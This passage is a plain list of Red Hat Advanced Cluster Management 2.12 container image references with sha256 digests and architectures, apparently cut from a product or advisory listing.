"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
